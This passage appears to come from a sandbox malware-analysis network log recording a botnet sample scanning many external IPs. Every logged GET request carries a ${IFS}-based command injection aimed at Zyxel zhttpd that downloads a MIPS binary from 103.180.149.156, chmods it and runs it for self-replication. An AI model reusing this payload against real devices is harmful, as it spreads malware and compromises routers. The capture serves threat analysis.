                                                        Feb 2, 2024 06:21:01.764029980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2342192.168.2.1449862219.80.210.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.764074087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2343192.168.2.144699043.1.133.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.764096022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2344192.168.2.1455096159.153.33.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.764126062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2345192.168.2.1444468206.209.78.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.764183998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2346192.168.2.1455470132.52.87.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.764234066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2347192.168.2.14570709.36.183.37443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.764265060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2348192.168.2.1446412207.15.53.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.764313936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2349192.168.2.1449654165.198.57.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.764362097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2350192.168.2.1443814140.244.177.58443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.764404058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2351192.168.2.143893050.69.222.76443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.764432907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2352192.168.2.143395689.90.11.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.764478922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2353192.168.2.1439028136.207.8.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.764513016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2354192.168.2.1442084211.155.0.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.764560938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2355192.168.2.1441754141.28.162.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.764605999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2356192.168.2.1449880180.171.83.177443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.764632940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2357192.168.2.1454348143.23.157.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.764679909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2358192.168.2.1441858180.59.109.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.764708042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2359192.168.2.145856843.22.215.10443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.764729023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2360192.168.2.1456382143.71.202.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.764801025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2361192.168.2.144137812.158.235.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.764827967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2362192.168.2.1444048146.33.116.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.764889956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2363192.168.2.145123461.21.189.27443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.764913082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2364192.168.2.1448904165.3.141.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.764966965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2365192.168.2.145335085.56.177.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.765002966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2366192.168.2.145848658.247.141.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.765044928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2367192.168.2.1456656205.239.214.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.765084982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2368192.168.2.1440520117.218.219.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.765125990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2369192.168.2.144442080.118.95.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.765160084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2370192.168.2.144522681.86.197.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.765208960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2371192.168.2.144011819.217.91.246443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.765254974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2372192.168.2.1440086186.206.238.95443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.765274048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2373192.168.2.145218268.70.179.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.765320063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2374192.168.2.1454334130.10.25.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.765379906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2375192.168.2.143321617.34.75.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.765409946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2376192.168.2.14541888.24.75.38443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.765455961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2377192.168.2.1450960158.153.147.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.765506029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2378192.168.2.1437116210.93.100.107443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.765537977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2379192.168.2.1441136140.107.59.179443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.765597105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2380192.168.2.144726051.173.33.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.765641928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2381192.168.2.1457458198.59.222.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.765687943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2382192.168.2.1448724182.19.115.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.765729904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2383192.168.2.1449678189.45.41.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.765774012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2384192.168.2.145889488.53.132.196443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.765803099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2385192.168.2.1433460202.196.230.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.765825033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2386192.168.2.146069248.114.201.42443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.765870094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2387192.168.2.145006663.47.236.193443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.765896082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2388192.168.2.1439024158.85.180.61443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.765933037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2389192.168.2.145728259.137.102.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.765963078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2390192.168.2.145441224.7.4.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.766007900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2391192.168.2.145126820.152.173.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.766042948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2392192.168.2.1451652119.209.170.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.766062021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2393192.168.2.1455212123.237.135.76443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.766141891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2394192.168.2.1449702199.110.45.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.766164064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2395192.168.2.1446188181.193.38.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.766210079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2396192.168.2.1442854138.62.9.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.766253948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2397192.168.2.145632666.26.8.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.766285896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2398192.168.2.144122035.238.134.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.766329050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2399192.168.2.144323290.41.75.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.766371965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2400192.168.2.1460184179.105.204.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.766402006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2401192.168.2.1444946136.27.177.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.766446114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2402192.168.2.1446900179.37.50.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.766505003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2403192.168.2.143375474.59.44.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.766513109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2404192.168.2.1459012116.251.171.181443
                                                        TimestampBytes transferredDirectionData
